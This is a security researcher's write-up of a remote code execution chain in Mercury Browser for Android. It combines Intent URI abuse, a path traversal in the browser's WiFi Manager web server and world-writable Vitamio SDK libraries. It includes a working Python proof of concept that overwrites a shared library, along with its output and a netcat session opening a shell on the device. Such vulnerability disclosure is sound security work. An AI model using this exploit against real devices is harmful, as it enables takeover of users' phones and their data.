Mercury Browser for Android RCE Redux


Overview

In my previous post about this browser, I have already covered how you can abuse the insecure parsing of the Intent URI scheme into invoking the private WiFi Manager feature. I also described how you can exploit a path traversal vulnerability in the custom web server used by the WiFi Manager feature, in order to arbitrarily read files from the browser's data directory.

Now we are going to cover how to achieve a fatality over the Mercury Browser for Android by gaining code execution.

Fatality

Remote Code Execution

The crux of the code execution issue in the Mercury Browser for Android is the use of the Vitamio SDK. Jake Van Dyke from NowSecure has already covered the vulnerability within this SDK, so be sure to apprise yourself before reading further.

We can see that the Mercury Browser has included Vitamio's shared library, and we don't have to use our imagination as to which Activities will be leveraging the SDK.

[2015-10-11 15:42:46.336020] File : lib/armeabi/libvinit.so
[2015-10-11 15:46:13.816848] Activity : com.ilegendsoft.mercury.ui.activities.filemanager.music.MusicPlayListActivity
[2015-10-11 15:46:13.816858] Activity : com.ilegendsoft.mercury.ui.activities.filemanager.music.MusicPlayerActivity
[2015-10-11 15:46:13.816867] Activity : com.ilegendsoft.mercury.ui.activities.filemanager.music.MusicAddActivity
[2015-10-11 15:46:13.816876] Activity : com.ilegendsoft.mercury.ui.activities.filemanager.video.viewer.VideoViewerActivity

If we open up an mp4 from the Mercury Browser's file manager, we get the following output:

Initialization

I/Vitamio[Init](13507): Extracting....  
I/Vitamio[Init](13507): 71/libOMX.11.so  
I/Vitamio[Init](13507): /data/data/com.ilegendsoft.mercury/libs/libOMX.11.so  
I/Vitamio[Init](13507): Extracting....  
I/Vitamio[Init](13507): 71/libOMX.14.so  
I/Vitamio[Init](13507): /data/data/com.ilegendsoft.mercury/libs/libOMX.14.so  
I/Vitamio[Init](13507): Extracting....  
I/Vitamio[Init](13507): 71/libOMX.18.so  
I/Vitamio[Init](13507): /data/data/com.ilegendsoft.mercury/libs/libOMX.18.so  
I/Vitamio[Init](13507): Extracting....  
I/Vitamio[Init](13507): 71/libOMX.9.so  
I/Vitamio[Init](13507): /data/data/com.ilegendsoft.mercury/libs/libOMX.9.so  
I/Vitamio[Init](13507): Extracting....  
I/Vitamio[Init](13507): 71/libstlport_shared.so  
I/Vitamio[Init](13507): /data/data/com.ilegendsoft.mercury/libs/libstlport_shared.so  
I/Vitamio[Init](13507): Extracting....  

Sure enough, as described in NowSecure's post, we have our target writeable libraries.

[email protected]:/data/data/com.ilegendsoft.mercury/libs # ls -la  
-rw------- u0_a115  u0_a115         2 2015-10-11 15:49 .lock
-rw-rw-rw- u0_a115  u0_a115     70780 2015-10-11 15:49 libOMX.11.so
-rw-rw-rw- u0_a115  u0_a115     70780 2015-10-11 15:49 libOMX.14.so
-rw-rw-rw- u0_a115  u0_a115     70780 2015-10-11 15:49 libOMX.18.so
-rw-rw-rw- u0_a115  u0_a115     70780 2015-10-11 15:49 libOMX.9.so
-rw-rw-rw- u0_a115  u0_a115   8019344 2015-10-11 15:49 libffmpeg.so
-rw-rw-rw- u0_a115  u0_a115    361788 2015-10-11 15:49 libstlport_shared.so
-rw-rw-rw- u0_a115  u0_a115     13508 2015-10-11 15:49 libvao.0.so
-rw-rw-rw- u0_a115  u0_a115    276848 2015-10-11 15:49 libvplayer.so
-rw-rw-rw- u0_a115  u0_a115    165776 2015-10-11 15:49 libvscanner.so
-rw-rw-rw- u0_a115  u0_a115     17660 2015-10-11 15:49 libvvo.0.so
-rw-rw-rw- u0_a115  u0_a115     17600 2015-10-11 15:49 libvvo.7.so
-rw-rw-rw- u0_a115  u0_a115     17600 2015-10-11 15:49 libvvo.8.so
-rw-rw-rw- u0_a115  u0_a115     13504 2015-10-11 15:49 libvvo.9.so
-rw-rw-rw- u0_a115  u0_a115     13504 2015-10-11 15:49 libvvo.j.so

So now we can use the original vulnerabilites to:

  • Invoke the WiFi Manager Activity through the Intent URI scheme abuse

  • Exploit the path traversal vulnerability in the custom web server to overwrite a target shared library

Below is the PoC code for exploiting the path traversal vulnerability:

import requests  
import sys

def do_exploit():

    url = "http://10.174.90.159:8888/doupload?dir="
    path_traversl = "../../../../data/data/com.ilegendsoft.mercury/libs/&id=15c516f6-cc7d-4c5b-8e40-6a1200e7b963"
    headers = {"Referer": "http://192.168.225.207:8888/"}
    files = {"libvplayer.0.so": open("libvplayer.so", "rb")}

    try:
        print("[*] Uploading shared library : libvplayer.so")
        r = requests.post("".join([url, path_traversl]), files=files, headers=headers)
        if r.status_code == 200:
            print("[*] Successfully uploaded")
            print("[*] {0}".format(r.text))
        else:
            print("[*] Could not upload")
    except Exception as e:
        raise e

if __name__ == "__main__":  
    try:
        do_exploit()
    except KeyboardInterrupt:
        sys.exit(0)

After the WiFi Manager Activity has been invoked, we can upload our payload:

└[~/R&D/mercury]> python upload_rce.py
[*] Uploading shared library : libvplayer.so
[*] Successfully uploaded
[*] ok

Now let's load up our mp4 again and see what happens. I didn't really spend to much time in making sure this was completely reliable, so somethings appear to crash when loading our custom payload. However, we still get a shell.

Crash

└[~/R&D/mercury]> nc 10.174.90.159 6666
id  
uid=10113(u0_a113) gid=10113(u0_a113) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),50113(all_a113) context=u:r:untrusted_app:s0